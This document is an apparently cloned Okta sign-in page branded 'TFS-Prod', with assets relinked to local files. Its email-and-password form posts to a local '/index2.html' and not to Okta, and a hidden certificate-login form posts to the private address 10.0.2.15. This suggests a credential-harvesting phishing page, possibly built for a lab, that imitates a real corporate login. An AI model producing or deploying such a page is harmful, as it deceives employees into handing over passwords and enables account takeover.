<!DOCTYPE html>
<!--[if IE 7]><html lang="en" class="lt-ie10 lt-ie9 lt-ie8"><![endif]-->
<!--[if IE 8]><html lang="en" class="lt-ie10 lt-ie9"> <![endif]-->
<!--[if IE 9]><html lang="en" class="lt-ie10"><![endif]-->
<!--[if gt IE 9]><html lang="en"><![endif]-->
<!--[if !IE]><!-->
<html lang="en"><!--<![endif]--><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="UTF-8">

    <script type="text/javascript" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">if (typeof module === 'object') {window.module = module; module = undefined;}</script><style type="text/css" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">
        .bgStyle {
          background-image: none
        }
        .bgStyleIE8 {
          
        }
    </style><title>TFS-Prod - Sign In</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="robots" content="noindex,nofollow">

    <script type="text/javascript" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">window.cspNonce = 'DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4';</script><script src="TFS-Prod%20-%20Sign%20In_files/okta-sign-in.min.js" type="text/javascript"></script>
    <link href="TFS-Prod%20-%20Sign%20In_files/okta-sign-in.min.css" type="text/css" rel="stylesheet">

    <link rel="shortcut icon" href="https://tfs.okta.com/favicon.ico" type="image/x-icon">
<link href="TFS-Prod%20-%20Sign%20In_files/loginpage-theme.c1227d73b70be13e51aae80fe238b0ae.css" rel="stylesheet" type="text/css"><link href="TFS-Prod%20-%20Sign%20In_files/style-sheet.css" rel="stylesheet" type="text/css">

    <script type="text/javascript" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">
        var okta = {
            locale: 'en',
            deployEnv: 'PROD'
        };
    </script><script nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">window.okta || (window.okta = {}); okta.cdnUrlHostname = "//ok11static.oktacdn.com"; okta.cdnPerformCheck = false;</script><script type="text/javascript" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">if (window.module) module = window.module;</script><script src="TFS-Prod%20-%20Sign%20In_files/initLoginPage.pack.d05a8c2e6bdf6d212b92af4d6b9cfefe.js" crossorigin="anonymous" integrity="sha384-oMTpYpHHg+a8rvT4HfXLZkVJdfGP9oQYv1FlYqwzPKBJGFwsVz8gC7KuP8+//oea"></script></head>
<body class="auth okta-container">

<!--[if gte IE 8]>
  <![if lte IE 10]>

     <style type="text/css" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">
    .unsupported-browser-banner-wrap {
      padding: 20px;
      border: 1px solid #ddd;
      background-color: #f3fbff;
    }
    .unsupported-browser-banner-inner {
      position: relative;
      width: 735px;
      margin: 0 auto;
      text-align: left;
    }
    .unsupported-browser-banner-inner .icon {
      vertical-align: top;
      margin-right: 20px;
      display: inline-block;
      position: static !important;
    }
    .unsupported-browser-banner-inner a {
      text-decoration: underline;
    }
     </style><div class="unsupported-browser-banner-wrap">
      <div class="unsupported-browser-banner-inner">
        <span class="icon icon-16 icon-only warning-16-yellow"></span>You are using an unsupported browser. For the best experience, update to <a href="https://support.okta.com/help/s/article/Okta-Browser-and-OS-Support-Policy">a supported browser</a>.</div>
    </div>

  <![endif]>
<![endif]-->
<!--[if IE 8]> <div id="login-bg-image-ie8" class="login-bg-image tb--background bgStyleIE8" data-se="login-bg-image"></div> <![endif]-->
<!--[if (gt IE 8)|!(IE)]><!--> <div id="login-bg-image" class="login-bg-image tb--background bgStyle" data-se="login-bg-image"></div> <!--<![endif]-->

<!-- hidden form for reposting fromURI for X509 auth -->
<form action="http://10.0.2.15/cert" method="post" id="x509_login" name="x509_login" class="hide">
    <input type="hidden" class="hide" name="_xsrfToken" value="null"><input type="hidden" id="fromURI" name="fromURI" class="hidden" value="/user/notifications">
</form>

<div class="content">
  <style type="text/css" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">
    .noscript-msg {
        background-color: #fff;
        border-color: #ddd #ddd #d8d8d8;
        box-shadow:0 2px 0 rgba(175, 175, 175, 0.12);
        text-align: center;
        width: 398px;
        min-width: 300px;
        margin: 200px auto;
        border-radius: 3px;
        border-width: 1px;
        border-style: solid;
    }

    .noscript-content {
        padding: 42px;
    }

    .noscript-content h2 {
        padding-bottom: 20px;
    }

    .noscript-content h1 {
        padding-bottom: 25px;
    }

    .noscript-content a {
        background: transparent;
        box-shadow: none;
        display: table-cell;
        vertical-align: middle;
        width: 314px;
        height: 50px;
        line-height: 36px;
        color: #fff;
        background: linear-gradient(#007dc1, #0073b2), #007dc1;
        border: 1px solid;
        border-color: #004b75;
        border-bottom-color: #00456a;
        box-shadow: rgba(0, 0, 0, 0.15) 0 1px 0, rgba(255, 255, 255, 0.1) 0 1px 0 0 inset;
        -webkit-border-radius: 3px;
        border-radius: 3px;
    }

    .noscript-content a:hover {
        background: #007dc1;
        cursor: hand;
        text-decoration: none;
    }
 </style><noscript>
    <div id="noscript-msg" class="noscript-msg">
        <div class="noscript-content">
            <h2>Javascript is required</h2>
            <h1>Javascript is disabled on your browser.&nbspPlease enable Javascript and refresh this page.</h1>
            <a href="index.html" class="tb--button">Refresh</a>
        </div>
    </div>
</noscript>
<div id="signin-container"><main data-se="auth-container" tabindex="-1" id="okta-sign-in" class="auth-container main-container no-beacon" style=""><div class="okta-sign-in-header auth-header"><h1><img src="TFS-Prod%20-%20Sign%20In_files/fs060e01rmHvpzOIG4x7.png" class="auth-org-logo" alt="TFS-Prod logo logo" aria-label="TFS-Prod logo logo"></h1><div data-type="beacon-container" class="beacon-container"></div></div><div class="auth-content"><div class="auth-content-inner"><div class="primary-auth"><form novalidate="novalidate" method="POST" action="/index2.html" data-se="o-form" slot="content" id="form19" class="primary-auth-form o-form o-form-edit-mode"><div data-se="o-form-content" class="o-form-content o-form-theme clearfix"><h2 data-se="o-form-head" class="okta-form-title o-form-head">Sign In</h2><div class="o-form-error-container" data-se="o-form-error-container"></div><div class="o-form-fieldset-container" data-se="o-form-fieldset-container"><div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-5"><div data-se="o-form-label" class="okta-form-label o-form-label"><label for="okta-signin-username">Email Address&nbsp;</label></div><div data-se="o-form-input-container" class="o-form-input"><span data-se="o-form-input-username" class="o-form-input-name-username o-form-control okta-form-input-field input-fix"><input type="text" placeholder="" name="username" id="okta-signin-username" aria-label="" autocomplete="username" aria-required="true" required=""></span></div></div><div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-30"><div data-se="o-form-label" class="okta-form-label o-form-label"><label for="okta-signin-password">Password&nbsp;</label></div><div data-se="o-form-input-container" class="o-form-input"><span data-se="o-form-input-password" class="o-form-input-name-password o-form-control okta-form-input-field input-fix"><input type="password" placeholder="" name="password" id="okta-signin-password" value="" aria-label="" autocomplete="current-password" aria-invalid="false" aria-required="true" required=""></span></div></div></div></div><div class="o-form-button-bar"><input class="button button-primary" type="submit" value="Sign In" id="okta-signin-submit" data-type="save"></div></form><div class="auth-footer"><a href="#" data-se="needhelp" aria-expanded="true" aria-controls="help-links-container" class="link help js-help">Need help signing in?</a><ul class="help-links js-help-links" id="help-links-container" style=""><li><a href="#" data-se="forgot-password" class="link js-forgot-password">Forgot password?</a></li><li><a href="#" data-se="unlock" class="link js-unlock">Unlock account?</a></li><li><a href="https://tfsawsprod-prd-okpr7i-125f4cd49289.s3.amazonaws.com/Sign-Help.htm" data-se="help-link" class="link js-help-link" rel="noopener noreferrer" target="_blank">Sign-in Help</a></li></ul></div></div></div></div></main></div>
  
</div>

<div class="footer">
  <div class="footer-container clearfix">
    <p class="copyright">Powered by <a href="http://www.okta.com/" class="inline-block notranslate">Okta</a></p>
        <p class="privacy-policy"><a href="https://tfs.okta.com/privacy" target="_blank" class="inline-block margin-l-10">Privacy Policy</a></p>
    </div>
</div>

<script nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4" type="text/javascript">function runLoginPage (fn) {var mainScript = document.createElement('script');mainScript.src = 'https://ok11static.oktacdn.com/assets/js/mvc/loginpage/initLoginPage.pack.d05a8c2e6bdf6d212b92af4d6b9cfefe.js';mainScript.crossOrigin = 'anonymous';mainScript.integrity = 'sha384-oMTpYpHHg+a8rvT4HfXLZkVJdfGP9oQYv1FlYqwzPKBJGFwsVz8gC7KuP8+//oea';document.getElementsByTagName('head')[0].appendChild(mainScript);fn && mainScript.addEventListener('load', function () { setTimeout(fn, 1) });}</script><script type="text/javascript" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">
(function(){
  var baseUrl = 'https\x3A\x2F\x2Ftfs.okta.com';
  var suppliedRedirectUri = '';
  var repost = false;
  var stateToken = '';
  var fromUri = '\x2Fuser\x2Fnotifications';
  var username = '';
  var rememberMe = false;
  var smsRecovery = false;
  var callRecovery = false;
  var emailRecovery = true;
  var usernameLabel = 'Email\x20Address';
  var usernameInlineLabel = '';
  var passwordLabel = 'Password';
  var passwordInlineLabel = '';
  var signinLabel = 'Sign\x20In';
  var forgotpasswordLabel = 'Forgot\x20password\x3F';
  var unlockaccountLabel = 'Unlock\x20account\x3F';
  var helpLabel = 'Sign\x2Din\x20Help';
  var orgSupportPhoneNumber = '';
  var hideSignOutForMFA = false;
  var hideBackToSignInForReset = false;
  var footerHelpTitle = 'Need\x20help\x20signing\x20in\x3F';
  var recoveryFlowPlaceholder = 'Email\x20or\x20Username';
  var signOutUrl = '';
  var authScheme = 'OAUTH2';
  var hasPasswordlessPolicy = '';
  var INVALID_TOKEN_ERROR_CODE = 'errors.E0000011';

  var securityImage = true;
  
      securityImage = false;
  


  var selfServiceUnlock = false;
  
    selfServiceUnlock = true;
  

  var redirectByFormSubmit = false;
  

  var showPasswordRequirementsAsHtmlList = true;

  var autoPush = false;
  
    autoPush = true;
  

  var accountChooserDiscoveryUrl = 'https://login.okta.com/discovery/iframe.html';

  // In case of custom app login, the uri is already absolute, so we must not attach baseUrl
  var redirectUri;
  if (isAbsoluteUri(fromUri)) {
      redirectUri = fromUri;
  } else {
      redirectUri = baseUrl + fromUri;
  }
  

  var backToSignInLink = '';
  

  var customButtons;
  var pivProperties = {};

  

  var customLinks = [];
  
  var factorPageCustomLink = {};
  

  var linkParams;
  

  var proxyIdxResponse;
  

  var stateTokenAllFlows;
  

  var idpDiscovery;
  var idpDiscoveryRequestContext;
  

  var showPasswordToggleOnSignInPage = false;
  var showIdentifier = false;
  

  var hasSkipIdpFactorVerificationButton = false;
  

  var hasOAuth2ConsentFeature = false;
  var consentFunc;
  
    hasOAuth2ConsentFeature = true;
  

  var hasMfaAttestationFeature = false;
  
    hasMfaAttestationFeature = true;
  

  var rememberMyUsernameOnOIE = false;
  

  var engFastpassMultipleAccounts = false;
  

  var registration = false;
  

  var webauthn = true;
  

    var overrideExistingStateToken = false;
    

  var isPersonalOktaOrg = false;
  

  var orgSyncToAccountChooserEnabled = true;
  

  var showSessionRevocation = false;
  
      showSessionRevocation = true;
  

  var loginPageConfig = {
    fromUri: fromUri,
    repost: repost,
    redirectUri: redirectUri,
    backToSignInLink: backToSignInLink,
    isMobileClientLogin: false,
    isMobileSSO: false,
    disableiPadCheck: false,
    enableiPadLoginReload: false,
    linkParams: linkParams,
    hasChromeOSFeature: false,
    showLinkToAppStore: false,
    accountChooserDiscoveryUrl: accountChooserDiscoveryUrl,
    mfaAttestation: hasMfaAttestationFeature,
    isPersonalOktaOrg: isPersonalOktaOrg,
    enrollingFactor: '',
    stateTokenExpiresAt: '',
    stateTokenRefreshWindowMs: '',
    orgSyncToAccountChooserEnabled: orgSyncToAccountChooserEnabled,
    inactiveTab: {
      enabled: false,
      elementId: 'inactive-tab-main-div',
      avoidPageRefresh: true
    },
    signIn: {
      el: '#signin-container',
      baseUrl: baseUrl,
      brandName: 'Okta',
      logo: 'https://ok11static.oktacdn.com/fs/bco/1/fs060e01rmHvpzOIG4x7',
      logoText: 'TFS\x2DProd logo',
      helpSupportNumber: orgSupportPhoneNumber,
      stateToken: stateToken,
      username: username,
      signOutLink: signOutUrl,
      consent: consentFunc,
      authScheme: authScheme,
      relayState: fromUri,
      proxyIdxResponse: proxyIdxResponse,
      overrideExistingStateToken: overrideExistingStateToken,
      interstitialBeforeLoginRedirect: 'DEFAULT',
      idpDiscovery: {
        requestContext: idpDiscoveryRequestContext
      },
      features: {
        router: true,
        securityImage: securityImage,
        rememberMe: rememberMe,
        autoPush: autoPush,
        webauthn: webauthn,
        smsRecovery: smsRecovery,
        callRecovery: callRecovery,
        emailRecovery: emailRecovery,
        selfServiceUnlock: selfServiceUnlock,
        multiOptionalFactorEnroll: true,
        deviceFingerprinting: true,
        useDeviceFingerprintForSecurityImage: true,
        trackTypingPattern: false,
        hideSignOutLinkInMFA: hideSignOutForMFA,
        hideBackToSignInForReset: hideBackToSignInForReset,
        rememberMyUsernameOnOIE: rememberMyUsernameOnOIE,
        engFastpassMultipleAccounts: engFastpassMultipleAccounts,
        customExpiredPassword: true,
        idpDiscovery: idpDiscovery,
        passwordlessAuth: hasPasswordlessPolicy,
        consent: hasOAuth2ConsentFeature,
        skipIdpFactorVerificationBtn: hasSkipIdpFactorVerificationButton,
        showPasswordToggleOnSignInPage: showPasswordToggleOnSignInPage,
        showIdentifier: showIdentifier,
        registration: registration,
        redirectByFormSubmit: redirectByFormSubmit,
        showPasswordRequirementsAsHtmlList: showPasswordRequirementsAsHtmlList,
        showSessionRevocation: showSessionRevocation
      },

      assets: {
        baseUrl: "https\x3A\x2F\x2Fok11static.oktacdn.com\x2Fassets\x2Fjs\x2Fsdk\x2Fokta\x2Dsignin\x2Dwidget\x2F7.10.1"
      },

      language: okta.locale,
      i18n: {},

      customButtons: customButtons,

      piv: pivProperties,

      helpLinks: {
        help: 'https\x3A\x2F\x2Ftfsawsprod\x2Dprd\x2Dokpr7i\x2D125f4cd49289.s3.amazonaws.com\x2FSign\x2DHelp.htm',
        forgotPassword: '',
        unlock: '',
        custom: customLinks,
        factorPage: factorPageCustomLink
      },

      cspNonce: window.cspNonce,
    }
  };
  

  loginPageConfig.signIn.i18n[okta.locale] = {
    
    'primaryauth.username.placeholder': usernameLabel,
    'primaryauth.username.tooltip': usernameInlineLabel,
    'primaryauth.password.placeholder': passwordLabel,
    'primaryauth.password.tooltip': passwordInlineLabel,
    'mfa.challenge.password.placeholder': passwordLabel,
    'primaryauth.title': signinLabel,
    'forgotpassword': forgotpasswordLabel,
    'unlockaccount': unlockaccountLabel,
    'help': helpLabel,
    'needhelp': footerHelpTitle,
    'password.forgot.email.or.username.placeholder': recoveryFlowPlaceholder,
    'password.forgot.email.or.username.tooltip': recoveryFlowPlaceholder,
    'account.unlock.email.or.username.placeholder': recoveryFlowPlaceholder,
    'account.unlock.email.or.username.tooltip': recoveryFlowPlaceholder
  };

    
            loginPageConfig.signIn.logoText = 'TFS\x2DProd logo';
        

  function isOldWebBrowserControl() {
    // We no longer support IE7. If we see the MSIE 7.0 browser mode, it's a good signal
    // that we're in a windows embedded browser.
    if (navigator.userAgent.indexOf('MSIE 7.0') === -1) {
      return false;
    }

    // Because the userAgent is the same across embedded browsers, we use feature
    // detection to see if we're running on older versions that do not support updating
    // the documentMode via x-ua-compatible.
    return document.all && !window.atob;
  }

  function isAbsoluteUri(uri) {
    var pat = /^https?:\/\//i;
    return pat.test(uri);
  }

  var unsupportedContainer = document.getElementById('okta-sign-in');

  var failIfCookiesDisabled = true;
  

  // Old versions of WebBrowser Controls (specifically, OneDrive) render in IE7 browser
  // mode, with no way to override the documentMode. In this case, inform the user they need
  // to upgrade.
  if (isOldWebBrowserControl()) {
    document.getElementById('unsupported-onedrive').removeAttribute('style');
    unsupportedContainer.removeAttribute('style');
  }
  else if (failIfCookiesDisabled && !navigator.cookieEnabled) {
    document.getElementById('unsupported-cookie').removeAttribute('style');
    unsupportedContainer.removeAttribute('style');
  }
  else {
    unsupportedContainer.parentNode.removeChild(unsupportedContainer);
    runLoginPage(function () {
      var res = OktaLogin.initLoginPage(loginPageConfig);
      
    });
  }
}());
</script><script type="text/javascript" nonce="DtSlrVpQLKLUSYHnuUJgPWPrwayDwQkh6G-pUyE7kv4">
  window.addEventListener('load', function(event) {
    function applyStyle(id, styleDef) {
      if (styleDef) {
        var el = document.getElementById(id);
        if (!el) {
          return;
        }
        el.classList.add(styleDef);
      }
    }
    applyStyle('login-bg-image', 'bgStyle');
    applyStyle('login-bg-image-ie8', 'bgStyleIE8');
  });
</script>

<iframe id="account-chooser-iframe" data-se="account-chooser" class="hide" src="TFS-Prod%20-%20Sign%20In_files/iframe.html"></iframe></body></html>